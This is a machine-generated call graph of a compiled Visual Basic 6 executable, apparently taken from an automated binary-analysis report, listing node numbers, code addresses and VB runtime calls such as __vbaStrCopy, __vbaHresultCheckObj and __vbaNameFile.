4147->4149 4150 407db3 4147->4150 4148->4147 4149->4150 4151 407e10 4150->4151 4152 407ded __vbaHresultCheckObj 4150->4152 4153 407e1a #618 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeObj 4151->4153 4152->4153 4154 407e76 4153->4154 4155 407f98 4153->4155 4156 407ea2 4154->4156 4157 407e86 __vbaNew2 4154->4157 4158 407fc4 4155->4158 4159 407fa8 __vbaNew2 4155->4159 4162 407ee1 __vbaHresultCheckObj 4156->4162 4163 407f04 4156->4163 4157->4156 4160 408003 __vbaHresultCheckObj 4158->4160 4161 408026 4158->4161 4159->4158 4160->4161 4164 408060 __vbaHresultCheckObj 4161->4164 4165 408083 4161->4165 4162->4163 4166 407f61 4163->4166 4167 407f3e __vbaHresultCheckObj 4163->4167 4168 40808d __vbaStrCat __vbaStrMove __vbaFreeStr __vbaFreeObj 4164->4168 4165->4168 4169 407f6b __vbaStrMove __vbaFreeObj 4166->4169 4167->4169 4170 4080b9 __vbaStrCopy 4168->4170 4169->4170 4242 40ee70 __vbaLenBstr 4170->4242 4172 4080d7 __vbaStrMove __vbaStrCopy __vbaFreeStrList 4173 408112 __vbaNew2 4172->4173 4174 40812e 4172->4174 4173->4174 4175 408190 4174->4175 4176 40816d __vbaHresultCheckObj 4174->4176 4177 4081ca __vbaHresultCheckObj 4175->4177 4178 4081ed 4175->4178 4176->4175 4179 4081f7 12 API calls 4177->4179 4178->4179 4180 40ee70 24 API calls 4179->4180 4181 4082a5 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4180->4181 4182 40ee70 24 API calls 4181->4182 4183 4082ee __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4182->4183 4184 40ee70 24 API calls 4183->4184 4185 40833e 6 API calls 4184->4185 4186 40ee70 24 API calls 4185->4186 4187 4083a3 6 API calls 4186->4187 4188 40ee70 24 API calls 4187->4188 4189 408402 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4188->4189 4190 40ee70 24 API calls 4189->4190 4191 408452 6 API calls 4190->4191 4192 40ee70 24 API calls 4191->4192 4193 4084b8 6 API calls 4192->4193 4194 40ee70 24 API calls 4193->4194 4195 408517 14 API calls 4194->4195 4196 40ee70 24 API calls 4195->4196 4197 4085ef 14 API calls 4196->4197 4198 40ee70 24 API calls 4197->4198 4199 4086ce 6 API calls 4198->4199 4200 40ee70 24 API calls 4199->4200 4201 408734 8 API calls 4200->4201 4202 40ee70 24 API calls 4201->4202 4203 4087a9 __vbaStrMove __vbaStrCopy __vbaFreeStrList 4202->4203 4255 4125a0 10 API calls 4203->4255 4205 4087e7 7 API calls 4206 4088bb __vbaStrCmp 4205->4206 4207 40885f 4205->4207 4209 408979 __vbaStrCmp 4206->4209 4210 4088dc 4206->4210 4270 418c90 6 API calls 4207->4270 4211 408a32 __vbaStrCopy 4209->4211 4212 40899a 4209->4212 4214 4125a0 60 API calls 4210->4214 4215 40ee70 24 API calls 4211->4215 4216 4125a0 60 API calls 4212->4216 4218 4088ef 4214->4218 4219 408a56 6 API calls 4215->4219 4220 4089ad 4216->4220 4222 408937 #600 __vbaEnd 4218->4222 4278 40fba0 __vbaChkstk __vbaOnError 4218->4278 4224 40ee70 24 API calls 4219->4224 4225 4089f5 #600 __vbaEnd 4220->4225 4228 40fba0 30 API calls 4220->4228 4222->4211 4227 408abc 8 API calls 4224->4227 4225->4211 4230 40ee70 24 API calls 4227->4230 4231 4089c6 4228->4231 4233 408b31 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4230->4233 4234 415660 145 API calls 4231->4234 4232 408921 #580 4232->4222 4235 40ee70 24 API calls 4233->4235 4236 4089df #580 4234->4236 4237 408b7a __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4235->4237 4236->4225 4238 40ee70 24 API calls 4237->4238 4239 408bc3 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4238->4239 4240 40ee70 24 API calls 4239->4240 4241 408c0c __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 4240->4241 4254 40eece 4242->4254 4243 40f136 __vbaStrCopy 4244 40f142 __vbaFreeStr 4243->4244 4244->4172 4245 40eef6 #631 __vbaStrMove #516 4246 40f18b __vbaErrorOverflow 4245->4246 4245->4254 4248 40ef68 __vbaFreeStr __vbaFreeVar 4248->4246 4248->4254 4249 40ef98 #631 __vbaStrMove #516 4249->4246 4249->4254 4250 40f00f __vbaFreeStr __vbaFreeVar 4250->4246 4250->4254 4251 40f040 #631 __vbaStrMove #516 4251->4246 4251->4254 4252 40f0af __vbaFreeStr __vbaFreeVar 4252->4246 4252->4254 4253 40f0ee #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr 4253->4246 4253->4254 4254->4243 4254->4244 4254->4245 4254->4246 4254->4248 4254->4249 4254->4250 4254->4251 4254->4252 4254->4253 4256 41267c 4255->4256 4257 41289e __vbaErrorOverflow 4255->4257 4256->4257 4258 412685 4256->4258 4259 412699 7 API calls 4258->4259 4266 412810 __vbaI2I4 __vbaFileClose 4258->4266 4261 40ee70 24 API calls 4259->4261 4263 412705 __vbaStrMove __vbaStrCopy __vbaStrMove #616 __vbaStrMove 4261->4263 4262 412875 __vbaFreeStr __vbaFreeStr 4262->4205 4264 40ee70 24 API calls 4263->4264 4265 41275b __vbaStrMove __vbaStrCmp __vbaFreeStrList 4264->4265 4265->4266 4267 41279f 4265->4267 4266->4262 4268 40ee70 24 API calls 4267->4268 4269 4127af 6 API calls 4268->4269 4269->4266 4332 405dd8 4270->4332 4334 40f8f0 __vbaStrToAnsi 4278->4334 4281 40fc43 4338 40f9a0 __vbaStrToAnsi 4281->4338 4282 40fc0b #580 #529 4283 408908 4282->4283 4287 415660 10 API calls 4283->4287 4286 40fc5e 18 API calls 4286->4283 4288 415742 4287->4288 4289 415d28 __vbaErrorOverflow 4287->4289 4288->4289 4290 41574b __vbaStrCopy 4288->4290 4291 40ee70 24 API calls 4290->4291 4292 41575e __vbaStrMove __vbaFreeStr 4291->4292 4293 4158e3 __vbaStrCat __vbaStrMove 4292->4293 4294 41577d __vbaLenBstr #525 __vbaStrMove __vbaI2I4 __vbaGet4 4292->4294 4295 4158fd 4293->4295 4296 40ee70 24 API calls 4294->4296 4297 40eab0 29 API calls 4295->4297 4298 4157b2 6 API calls 4296->4298 4299 415902 __vbaStrMove __vbaFreeStr 4297->4299 4300 4158c7 __vbaStrCat __vbaStrMove 4298->4300 4301 415816 4298->4301 4302 415912 8 API calls 4299->4302 4300->4295 4303 40ee70 24 API calls 4301->4303 4309 41597d 4302->4309 4304 41581f 6 API calls 4303->4304 4344 40eab0 #594 __vbaFreeVar __vbaLenBstr 4304->4344 4305 415a25 #594 __vbaFreeVar __vbaRedim 4315 415a67 4305->4315 4307 415860 __vbaStrMove __vbaFreeStrList 4307->4289 4310 41588b __vbaI2I4 __vbaGet4 4307->4310 4308 4159a0 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 4308->4289 4308->4309 4309->4289 4309->4305 4309->4308 4314 4159e8 6 API calls 4309->4314 4320 4158a5 4310->4320 4311 415b11 4316 415b1f __vbaSetSystemError 4311->4316 4321 415b25 4311->4321 4312 415a74 #593 4313 415abd __vbaGenerateBoundsError 4312->4313 4312->4315 4313->4315 4314->4309 4315->4311 4315->4312 4315->4313 4317 415aaf __vbaGenerateBoundsError 4315->4317 4318 415d23 4315->4318 4319 415adf __vbaFpUI1 __vbaFreeVar 4315->4319 4316->4321 4317->4315 4318->4289 4319->4289 4319->4315 4320->4289 4320->4302 4321->4289 4322 415b92 4321->4322 4323 415b6b __vbaI2I4 __vbaPutOwner3 4321->4323 4322->4289 4324 415b9e #593 4322->4324 4323->4289 4323->4321 4324->4318 4325 415bd5 __vbaFpI4 __vbaFreeVar 4324->4325 4326 415bfa __vbaRedimPreserve __vbaI2I4 __vbaPutOwner3 4325->4326 4327 415bef 4325->4327 4326->4289 4328 415c34 4326->4328 4329 415bf4 __vbaSetSystemError 4327->4329 4328->4289 4330 415c3d 9 API calls 4328->4330 4329->4326 4331 415ce0 6 API calls 4330->4331 4331->4232 4333 405de1 4332->4333 4342 405768 4334->4342 4336 40f937 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 4337 40f958 4336->4337 4337->4281 4337->4282 4339 405768 4338->4339 4340 40f9e7 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 4339->4340 4341 40fa08 4340->4341 4341->4283 4341->4286 4343 405771 4342->4343 4350 40eb43 4344->4350 4345 40ede6 __vbaStrCopy 4347 40ee44 __vbaFreeStr 4345->4347 4346 40eb4f #631 __vbaStrMove #516 __vbaFreeStr __vbaFreeVar 4348 40ee69 __vbaErrorOverflow 4346->4348 4346->4350 4347->4307 4349 40ec68 #593 4349->4348 4349->4350 4350->4345 4350->4346 4350->4348 4350->4349 4351 40ee64 4350->4351 4352 40ecf9 17 API calls 4350->4352 4351->4348 4352->4348 4352->4350 5441 404850 5442 40d750 __vbaChkstk 5441->5442 5443 40d7a5 __vbaOnError 5442->5443 5444 40f9a0 4 API calls 5443->5444 5445 40d7cb 5444->5445 5446 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 5445->5446 5447 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 5445->5447 5448 40d841 __vbaStrCat __vbaStrMove 5446->5448 5449 40d82a __vbaStrCopy 5446->5449 5451 40d864 __vbaInStr __vbaInStr 5448->5451 5449->5451 5452 40e11d #598 5451->5452 5453 40d8ad 5451->5453 5452->5447 5454 40d8cf 6 API calls 5453->5454 5456 40d8c9 __vbaSetSystemError 5453->5456 5455 404c70 5454->5455 5457 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 5455->5457 5456->5454 5457->5452 5458 40d99c __vbaStrFixstr __vbaStrMove 5457->5458 5459 40ff70 14 API calls 5458->5459 5460 40d9c9 7 API calls 5459->5460 5461 40e1d1 __vbaErrorOverflow 5460->5461 5462 40da8b 7 API calls 5460->5462 5475 40e1e0 5461->5475 5463 40df09 6 API calls 5462->5463 5482 40daf3 5462->5482 5464 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 5463->5464 5465 40e09e #598 __vbaRecUniToAnsi 5463->5465 5464->5465 5467 40e028 5464->5467 5465->5482 5466 40f8f0 4 API calls 5466->5482 5468 40e04a #580 __vbaStrToAnsi 5467->5468 5472 40e044 __vbaSetSystemError 5467->5472 5474 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 5467->5474 5468->5467 5469 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 5469->5458 5471 40e107 5469->5471 5470 4123c0 47 API calls 5473 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 5470->5473 5477 40e117 __vbaSetSystemError 5471->5477 5472->5468 5476 40ee70 24 API calls 5473->5476 5474->5465 5478 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5476->5478 5477->5452 5479 40dbbb __vbaStrCopy 5478->5479 5478->5482 5480 40ee70 24 API calls 5479->5480 5481 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5480->5481 5481->5482 5483 40dc2f __vbaStrCat __vbaStrMove 5481->5483 5482->5465 5482->5466 5482->5469 5482->5470 5485 4128b0 65 API calls 5482->5485 5488 411d10 1112 API calls 5482->5488 5484 40fba0 30 API calls 5483->5484 5486 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 5484->5486 5485->5482 5487 415660 145 API calls 5486->5487 5489 40dc9b __vbaFreeStr 5487->5489 5488->5482 5489->5482 5490 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5489->5490 5491 40fba0 30 API calls 5490->5491 5492 40dd14 5491->5492 5493 40dd24 __vbaNew2 5492->5493 5494 40dd63 __vbaObjSet __vbaObjSet 5492->5494 5493->5492 5495 412c10 452 API calls 5494->5495 5496 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 5495->5496 5497 415d30 404 API calls 5496->5497 5498 40de0a __vbaFreeStr #598 __vbaStrCat __vbaStrMove 5497->5498 5499 4111a0 122 API calls 5498->5499 5500 40de51 __vbaFreeStr 5499->5500 5500->5482 5501 40de6f #598 5500->5501 5502 40fba0 30 API calls 5501->5502 5503 40de8c __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 5502->5503 5503->5482 5504 408c50 5505 40ee70 24 API calls 5504->5505 5506 408c55 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5505->5506 5507 40ee70 24 API calls 5506->5507 5508 408c9e __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5507->5508 5509 40ee70 24 API calls 5508->5509 5510 408ce7 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5509->5510 5511 40ee70 24 API calls 5510->5511 5512 408d30 __vbaStrMove __vbaStrCopy __vbaFreeStrList 5511->5512 5513 408d91 5512->5513 5514 408da2 18 API calls 5513->5514 5515 4091be __vbaStrCmp 5513->5515 5516 410180 65 API calls 5514->5516 5517 4091e0 5515->5517 5518 40948c __vbaStrCmp 5515->5518 5519 408e8c 19 API calls 5516->5519 5522 4125a0 60 API calls 5517->5522 5520 409b34 __vbaStrCopy 5518->5520 5521 4094ae 5518->5521 5523 410180 65 API calls 5519->5523 5525 40ee70 24 API calls 5520->5525 5524 4125a0 60 API calls 5521->5524 5526 409203 5522->5526 5527 408fa5 7 API calls 5523->5527 5528 4094c1 5524->5528 5529 409b52 __vbaStrMove __vbaStrCopy 5525->5529 5530 40924b __vbaStrCat #600 __vbaFreeVar 5526->5530 5536 40fba0 30 API calls 5526->5536 5533 410180 65 API calls 5527->5533 5534 409509 __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 5528->5534 5540 40fba0 30 API calls 5528->5540 5535 40ee70 24 API calls 5529->5535 5531 409298 5530->5531 5532 4092aa __vbaStrCopy 5530->5532 5544 4092a4 __vbaSetSystemError 5531->5544 5539 40ee70 24 API calls 5532->5539 5538 40902e 25 API calls 5533->5538 5542 409573 5534->5542 5541 409b74 13 API calls 5535->5541 5537 40921c 5536->5537 5543 415660 145 API calls 5537->5543 5545 410180 65 API calls 5538->5545 5546 4092c8 __vbaStrMove __vbaStrCopy __vbaFreeStrList 5539->5546 5547 4094da 5540->5547 5548 411590 145 API calls 5541->5548 5550 409584 __vbaHresultCheckObj 5542->5550 5551 4095a7 5542->5551 5552 409235 #580 5543->5552 5544->5532 5553 409177 __vbaFreeStrList 5545->5553 5558 409309 __vbaObjSet 5546->5558 5554 415660 145 API calls 5547->5554 5549 409c6c __vbaFreeStrList 5548->5549 5555 409c99 __vbaEnd 5549->5555 5556 409cab 5549->5556 5557 4095b1 __vbaFreeObj 5550->5557 5551->5557 5552->5530 5559 4094f3 #580 5554->5559 5560 409dec __vbaStrCopy 5555->5560 5561 4125a0 60 API calls 5556->5561 5564 4095d0 __vbaStrCopy 5557->5564 5565 40932e 5558->5565 5559->5534 5562 40ee70 24 API calls 5560->5562 5563 409cbe 5561->5563 5566 409e0a __vbaStrMove __vbaStrCopy 5562->5566 5563->5560 5567 409cca #535 5563->5567 5568 410fb0 18 API calls 5564->5568 5569 409362 5565->5569 5570 40933f __vbaHresultCheckObj 5565->5570 5572 40ee70 24 API calls 5566->5572 5573 40aba7 5567->5573 5574 409cea 8 API calls 5567->5574 5575 4095ee __vbaStrMove 5568->5575 5571 40936c 7 API calls 5569->5571 5570->5571 5576 410780 47 API calls 5571->5576 5577 409e2c 7 API calls 5572->5577 5573->5573 5578 410180 65 API calls 5574->5578 5579 40ee70 24 API calls 5575->5579 5580 4093d0 __vbaFreeStrList 5576->5580 5581 409ee9 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 5577->5581 5582 409d5a __vbaFreeStrList 5578->5582 5583 409603 __vbaStrMove __vbaInStr __vbaFreeStrList 5579->5583 5584 409405 8 API calls 5580->5584 5585 409487 5580->5585 5586 418c90 20 API calls 5581->5586 5587 40fba0 30 API calls 5582->5587 5588 4097e2 __vbaStrCopy 5583->5588 5589 40964c __vbaStrCopy 5583->5589 5584->5585 5585->5581 5591 409f3c __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 5586->5591 5592 409d86 #598 5587->5592 5590 410fb0 18 API calls 5588->5590 5593 40ee70 24 API calls 5589->5593 5594 409800 __vbaStrMove 5590->5594 5595 418c90 20 API calls 5591->5595 5596 415660 145 API calls 5592->5596 5597 40966a __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5593->5597 5598 40ee70 24 API calls 5594->5598 5599 409fa2 __vbaFreeStrList 5595->5599 5600 409dac 5596->5600 5601 40ee70 24 API calls 5597->5601 5602 409815 __vbaStrMove __vbaInStr __vbaFreeStrList 5598->5602 5603 418a10 15 API calls 5599->5603 5604 409db3 5600->5604 5605 409db5 #535 __vbaFpR4 5600->5605 5606 4096b3 15 API calls 5601->5606 5607 409aad __vbaObjSet 5602->5607 5608 40985e 5602->5608 5609 409fd4 5603->5609 5610 409dd6 #580 5604->5610 5605->5574 5605->5610 5606->5607 5617 409ae8 5607->5617 5611 40986e __vbaNew2 5608->5611 5614 40988a 5608->5614 5612 418a10 15 API calls 5609->5612 5610->5560 5611->5614 5615 409ff2 __vbaStrCopy 5612->5615 5622 4098c9 __vbaHresultCheckObj 5614->5622 5623 4098ec 5614->5623 5616 40ee70 24 API calls 5615->5616 5618 40a010 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5616->5618 5620 409af9 __vbaHresultCheckObj 5617->5620 5621 409b1c 5617->5621 5619 40ee70 24 API calls 5618->5619 5624 40a059 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5619->5624 5625 409b26 __vbaFreeObj 5620->5625 5621->5625 5622->5623 5629 409926 __vbaHresultCheckObj 5623->5629 5630 409949 5623->5630 5626 40ee70 24 API calls 5624->5626 5625->5581 5627 40a0a2 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5626->5627 5628 40ee70 24 API calls 5627->5628 5632 40a0eb __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5628->5632 5631 409953 20 API calls 5629->5631 5630->5631 5631->5607 5633 40ee70 24 API calls 5632->5633 5634 40a13b 6 API calls 5633->5634 5635 40ee70 24 API calls 5634->5635 5636 40a1a1 6 API calls 5635->5636 5637 40ee70 24 API calls 5636->5637 5638 40a200 __vbaStrMove __vbaStrCopy __vbaFreeStrList 5637->5638 5639 40a261 5638->5639 5640 40a272 __vbaStrCat __vbaStrMove 5639->5640 5641 40aa5b 5639->5641 5642 40f8f0 4 API calls 5640->5642 5643 40f1d0 120 API calls 5641->5643 5644 40a2a0 __vbaFreeStr 5642->5644 5645 40aa6c 5643->5645 5646 40a329 __vbaStrCat __vbaStrMove 5644->5646 5647 40a2bb 7 API calls 5644->5647 5648 40aa7f __vbaObjSet 5645->5648 5696 40f1a0 __vbaStrCopy __vbaStrCopy 5645->5696 5649 40f8f0 4 API calls 5646->5649 5647->5646 5655 40aaba 5648->5655 5652 40a357 __vbaFreeStr 5649->5652 5653 40a3e0 __vbaStrCat __vbaStrMove 5652->5653 5654 40a372 7 API calls 5652->5654 5656 40f8f0 4 API calls 5653->5656 5654->5653 5657 40aacb __vbaHresultCheckObj 5655->5657 5658 40aaee 5655->5658 5659 40a40e __vbaFreeStr 5656->5659 5660 40aaf8 __vbaFreeObj 5657->5660 5658->5660 5661 40a497 __vbaStrCat __vbaStrMove 5659->5661 5662 40a429 7 API calls 5659->5662 5664 40ab6f __vbaFreeStr __vbaFreeStr 5660->5664 5663 40f8f0 4 API calls 5661->5663 5662->5661 5665 40a4c5 __vbaFreeStr 5663->5665 5666 40a4e0 7 API calls 5665->5666 5667 40a54e __vbaStrCat __vbaStrMove 5665->5667 5666->5667 5668 40f8f0 4 API calls 5667->5668 5669 40a57c __vbaFreeStr 5668->5669 5670 40a605 __vbaStrCat __vbaStrMove 5669->5670 5671 40a597 7 API calls 5669->5671 5672 40f8f0 4 API calls 5670->5672 5671->5670 5673 40a633 __vbaFreeStr 5672->5673 5674 40a6bc __vbaStrCat __vbaStrMove 5673->5674 5675 40a64e 7 API calls 5673->5675 5676 40f8f0 4 API calls 5674->5676 5675->5674 5677 40a6ea __vbaFreeStr 5676->5677 5678 40a773 __vbaStrCat __vbaStrMove 5677->5678 5679 40a705 7 API calls 5677->5679 5680 40f8f0 4 API calls 5678->5680 5679->5678 5681 40a7a1 __vbaFreeStr 5680->5681 5682 40a82a __vbaStrCat __vbaStrMove 5681->5682 5683 40a7bc 7 API calls 5681->5683 5684 40f8f0 4 API calls 5682->5684 5683->5682 5685 40a858 __vbaFreeStr 5684->5685 5686 40a8e1 __vbaStrCat __vbaStrMove 5685->5686 5687 40a873 7 API calls 5685->5687 5688 40f8f0 4 API calls 5686->5688 5687->5686 5689 40a90f __vbaFreeStr 5688->5689 5690 40a998 __vbaStrCat __vbaStrMove 5689->5690 5691 40a92a 7 API calls 5689->5691 5692 40f8f0 4 API calls 5690->5692 5691->5690 5693 40a9c6 __vbaFreeStr 5692->5693 5694 40a9e1 7 API calls 5693->5694 5695 40aa4f 5693->5695 5694->5695 5696->5648 5697 40e250 5698 40e28a __vbaOnError 5697->5698 5699 40e2a8 5698->5699 5700 40e2c0 5699->5700 5701 40e2ae __vbaHresultCheckObj 5699->5701 5702 40e2d8 __vbaHresultCheckObj 5700->5702 5703 40e2ea __vbaFreeObj __vbaExitProc 5700->5703 5701->5700 5702->5703 5704 40e310 5703->5704 6013 40d4d4 6014 40d741 __vbaErrorOverflow 6013->6014 6017 40d4e5 6013->6017 6015 40d750 __vbaChkstk 6014->6015 6018 40d7a5 __vbaOnError 6015->6018 6016 40d6db 6016->6014 6017->6016 6023 40d567 6017->6023 6024 40d547 __vbaHresultCheckObj 6017->6024 6019 40f9a0 4 API calls 6018->6019 6020 40d7cb 6019->6020 6021 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 6020->6021 6022 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 6020->6022 6025 40d841 __vbaStrCat __vbaStrMove 6021->6025 6026 40d82a __vbaStrCopy 6021->6026 6027 40d571 __vbaChkstk 6023->6027 6024->6027 6029 40d864 __vbaInStr __vbaInStr 6025->6029 6026->6029 6032 40d5b9 6027->6032 6030 40e11d #598 6029->6030 6031 40d8ad 6029->6031 6030->6022 6033 40d8cf 6 API calls 6031->6033 6037 40d8c9 __vbaSetSystemError 6031->6037 6034 40d5ea __vbaObjSet 6032->6034 6035 40d5ca __vbaHresultCheckObj 6032->6035 6036 404c70 6033->6036 6042 40d646 6034->6042 6035->6034 6038 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 6036->6038 6037->6033 6038->6030 6039 40d99c __vbaStrFixstr __vbaStrMove 6038->6039 6041 40ff70 14 API calls 6039->6041 6043 40d9c9 7 API calls 6041->6043 6044 40d651 __vbaHresultCheckObj 6042->6044 6045 40d66e 6042->6045 6046 40e1d1 __vbaErrorOverflow 6043->6046 6047 40da8b 7 API calls 6043->6047 6048 40d678 __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 6044->6048 6045->6048 6061 40e1e0 6046->6061 6049 40df09 6 API calls 6047->6049 6072 40daf3 6047->6072 6048->6014 6050 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 6049->6050 6051 40e09e #598 __vbaRecUniToAnsi 6049->6051 6050->6051 6053 40e028 6050->6053 6051->6072 6052 40f8f0 4 API calls 6052->6072 6054 40e04a #580 __vbaStrToAnsi 6053->6054 6058 40e044 __vbaSetSystemError 6053->6058 6060 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 6053->6060 6054->6053 6055 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 6055->6039 6057 40e107 6055->6057 6056 4123c0 47 API calls 6059 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 6056->6059 6063 40e117 __vbaSetSystemError 6057->6063 6058->6054 6062 40ee70 24 API calls 6059->6062 6060->6051 6064 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 6062->6064 6063->6030 6065 40dbbb __vbaStrCopy 6064->6065 6064->6072 6066 40ee70 24 API calls 6065->6066 6067 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 6066->6067 6068 40dc2f __vbaStrCat __vbaStrMove 6067->6068 6067->6072 6069 40fba0 30 API calls 6068->6069 6071 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 6069->6071 6070 4128b0 65 API calls 6070->6072 6073 415660 145 API calls 6071->6073 6072->6051 6072->6052 6072->6055 6072->6056 6072->6070 6074 411d10 1112 API calls 6072->6074 6075 40dc9b __vbaFreeStr 6073->6075 6074->6072 6075->6072 6076 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 6075->6076 6077 40fba0 30 API calls 6076->6077 6078 40dd14 6077->6078 6079 40dd24 __vbaNew2 6078->6079 6080 40dd63 __vbaObjSet __vbaObjSet 6078->6080 6079->6078 6081 412c10 452 API calls 6080->6081 6082 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 6081->6082 6083 415d30 404 API calls 6082->6083 6084 40de0a __vbaFreeStr #598 __vbaStrCat __vbaStrMove 6083->6084 6085 4111a0 122 API calls 6084->6085 6086 40de51 __vbaFreeStr 6085->6086 6086->6072 6087 40de6f #598 6086->6087 6088 40fba0 30 API calls 6087->6088 6089 40de8c __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 6088->6089 6089->6072 5705 418954 5706 418957 __vbaExitProc 5705->5706 5707 40fb57 5708 40fb61 __vbaFreeStr 5707->5708 5709 40fb6a __vbaFreeVar 5707->5709 5708->5709 5710 417458 __vbaExitProc 5711 417470 6 API calls 5710->5711 5715 40e666 __vbaFreeStr 6093 4160e6 __vbaAryUnlock __vbaFreeStr 5716 40256a 5717 402576 5716->5717 5718 4024f7 5717->5718 5719 4025ca __vbaExceptHandler 5717->5719 5721 40e570 __vbaChkstk 5722 40e5c5 8 API calls 5721->5722 5723 40e670 __vbaFreeObj 5722->5723 5724 40cd70 __vbaOnError 5725 40cdcd __vbaObjSet 5724->5725 5726 40cde4 5725->5726 5727 40cdf9 5726->5727 5728 40cdea __vbaHresultCheckObj 5726->5728 5729 40cf61 __vbaErrorOverflow 5727->5729 5730 40ce07 __vbaFreeObj 5727->5730 5728->5727 5731 40cf70 __vbaChkstk 5729->5731 5737 40ce29 5730->5737 5734 40cfc5 __vbaOnError 5731->5734 5732 40cf0c __vbaExitProc 5733 40cf41 5732->5733 5736 40d001 __vbaObjSet 5734->5736 5735 40ce3f __vbaObjSet 5735->5737 5738 40d01f 5736->5738 5737->5729 5737->5732 5737->5735 5739 40ce60 __vbaHresultCheckObj 5737->5739 5740 40ce6f 6 API calls 5737->5740 5741 40d047 5738->5741 5742 40d02a __vbaHresultCheckObj 5738->5742 5739->5740 5740->5737 5743 40cef8 __vbaExitProc 5740->5743 5744 40d741 __vbaErrorOverflow 5741->5744 5745 40d05f __vbaFreeObj 5741->5745 5742->5741 5743->5733 5746 40d750 __vbaChkstk 5744->5746 5758 40d080 5745->5758 5748 40d7a5 __vbaOnError 5746->5748 5747 40d144 __vbaCastObj __vbaObjSet 5750 40d173 5747->5750 5749 40f9a0 4 API calls 5748->5749 5752 40d7cb 5749->5752 5753 40d19e 5750->5753 5754 40d17e __vbaHresultCheckObj 5750->5754 5751 40d0bc __vbaObjSet 5751->5758 5755 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 5752->5755 5756 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 5752->5756 5757 40d1a8 __vbaFreeObj 5753->5757 5754->5757 5759 40d841 __vbaStrCat __vbaStrMove 5755->5759 5760 40d82a __vbaStrCopy 5755->5760 5765 40d1c7 __vbaObjSet 5757->5765 5758->5744 5758->5747 5758->5751 5762 40d0ea __vbaHresultCheckObj 5758->5762 5763 40d111 __vbaLateIdCall __vbaFreeObjList 5758->5763 5764 40d864 __vbaInStr __vbaInStr 5759->5764 5760->5764 5762->5763 5763->5758 5766 40e11d #598 5764->5766 5767 40d8ad 5764->5767 5769 40d1e5 5765->5769 5766->5756 5768 40d8cf 6 API calls 5767->5768 5773 40d8c9 __vbaSetSystemError 5767->5773 5772 404c70 5768->5772 5770 40d1f0 __vbaHresultCheckObj 5769->5770 5771 40d20d 5769->5771 5770->5771 5771->5744 5775 40d225 __vbaFreeObj 5771->5775 5774 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 5772->5774 5773->5768 5774->5766 5776 40d99c __vbaStrFixstr __vbaStrMove 5774->5776 5777 40d25b 5775->5777 5778 40ff70 14 API calls 5776->5778 5780 40d390 __vbaNew __vbaObjSet 5777->5780 5781 40d26c 5777->5781 5779 40d9c9 7 API calls 5778->5779 5782 40e1d1 __vbaErrorOverflow 5779->5782 5783 40da8b 7 API calls 5779->5783 5787 40d3bd 5780->5787 5784 40d298 __vbaObjSet 5781->5784 5785 40d27c __vbaNew2 5781->5785 5793 40e1e0 5782->5793 5786 40df09 6 API calls 5783->5786 5824 40daf3 5783->5824 5802 40d2df 5784->5802 5785->5784 5788 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 5786->5788 5789 40e09e #598 